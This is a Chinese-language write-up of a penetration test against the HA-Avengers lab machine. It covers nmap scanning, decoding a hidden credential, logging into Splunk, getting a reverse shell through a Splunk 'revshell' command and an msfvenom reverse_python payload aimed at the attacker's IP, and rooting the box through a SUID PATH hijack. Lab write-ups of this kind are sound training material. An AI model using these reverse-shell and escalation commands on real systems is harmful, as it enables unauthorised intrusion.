HA-Avengers靶机渗透

  • A+
所属分类:安全文章


HA-Avengers靶机渗透
HA-Avengers靶机渗透

0x01 确定靶机即开放端口信





HA-Avengers靶机渗透

攻击机ip:192.168.19.174


靶机ip:不知道,与攻击机都在NAT模式



a.扫描网段,确定靶机ip


nmap -sP 192.168.19.0/24


HA-Avengers靶机渗透


因为提前知道了攻击机的ip为192.168.19.174,在同一局域网我们便确定了靶机的ip为192.168.19.175


b.扫描靶机开放的端口


nmap -A 192.168.19.175


HA-Avengers靶机渗透


根据扫描的结果,我们知道靶机开放了80,8000等端口,还开放了/groot的目录。




HA-Avengers靶机渗透
HA-Avengers靶机渗透

0x02 访问web界面,进行web渗透





HA-Avengers靶机渗透


在web界面中,并没有得到什么有用的信息,根据平时渗透的经验,一些信息可能被注释在源码中。所以我们从源码开始下手。


在源码中,我们看到了几个超链接,在一个超链接中,我们发现了如下信息:


HA-Avengers靶机渗透


尝试用base64,unicode等解密方法解密,尝试16进制解密后发现了如下类似于账号和密码的信息:

agent:avengers


有可能是靶机的账号加上密码,所以下一步我们尝试用ssh进行登录:


HA-Avengers靶机渗透


但是ssh登录失败,所以这不是系统用户,可能是某一个插件的账号




HA-Avengers靶机渗透
HA-Avengers靶机渗透

0x03 访问8000端口,继续收集信息





在拿到一个类似于账号加密码的信息之后,发现利用ssh登录失败,回到最初扫描得到的信息中,访问8000端口。访问之后,我们发现了系统安装了Splunk,进入到Splunk的主界面上,有一个用户登录的信息,尝试用刚刚拿到的信息进行登录。


利用刚才得到的账号加密码,我们成功地登陆了Splunk的后台


HA-Avengers靶机渗透


从网上搜了一下Splunk的使用方法之后,我们可以上传一个shell的gz包


HA-Avengers靶机渗透


| revshell std 192.168.19.175 1234


上传shell的gz包后,我们利用命令触发shell反弹


HA-Avengers靶机渗透


HA-Avengers靶机渗透


拿到一个普通用户的权限之后,接下来的任务就是提权了



HA-Avengers靶机渗透
HA-Avengers靶机渗透

0x04 提权





a.获得交互式shell


可以使用msfvenom命令生成一个python的交互式命令


msfvenom -p cmd/unix/reverse_python lhost=192.168.19.174 lport=4444 R


执行成功后,会生成一个关于python的base64代码

HA-Avengers靶机渗透


我们将生成的python payload直接在刚刚已经获得的普通用户的shell上直接运行,在kali端进行端口的监听,这样在获得一个shell之后,我们就可以用python的交互式命令得到一个交互式的shell


HA-Avengers靶机渗透


b.内核提权


HA-Avengers靶机渗透


在这里我们查到的信息为:系统版本为18.04,内核版本为4.18,在kali上找一下相关的exp,没有找到相关的exp。


c.SUID提权


首先查找系统内的SUID可执行文件


find / -perm -u=s -type f 2>/dev/null


HA-Avengers靶机渗透


在查找文件的时候,发现了这样一个文件/opt/ignite,尝试一下从这个文件下手。

找了一下相关suid提权的相关思路,利用suid提权,成功拿到了root的权限


cd /tmpecho "/bin/bash" > ifconfigchmod 777 ifconfigexport PATH=/tmp:$PATH/opt/ignitecd /root


HA-Avengers靶机渗透




end



HA-Avengers靶机渗透

本文始发于微信公众号(雷石安全实验室):HA-Avengers靶机渗透

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: